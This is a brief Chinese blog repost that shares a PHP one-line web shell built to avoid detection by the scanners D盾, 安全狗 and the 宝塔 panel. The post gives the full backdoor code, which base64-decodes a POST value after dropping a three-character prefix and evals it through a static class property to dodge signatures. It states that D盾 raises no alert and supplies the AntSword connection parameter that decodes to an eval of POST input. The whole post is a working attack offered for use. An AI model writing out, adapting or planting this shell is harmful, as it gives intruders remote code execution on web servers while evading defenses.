分享一个过狗过D盾过宝塔的php一句话木马
时间:2021-09-06 20:06:38
收藏:0
阅读:105
<?php if(isset($_REQUEST[‘phpsessid‘])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST[‘key‘],3)); eval(B::$d); } ?>
D盾查杀无提示
利用方法如图,实际就是「任意3个字符的前缀+base64编码的PHP代码」
中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1
连接成功
原文:https://www.cnblogs.com/ta1zi/p/15234893.html
评论(0)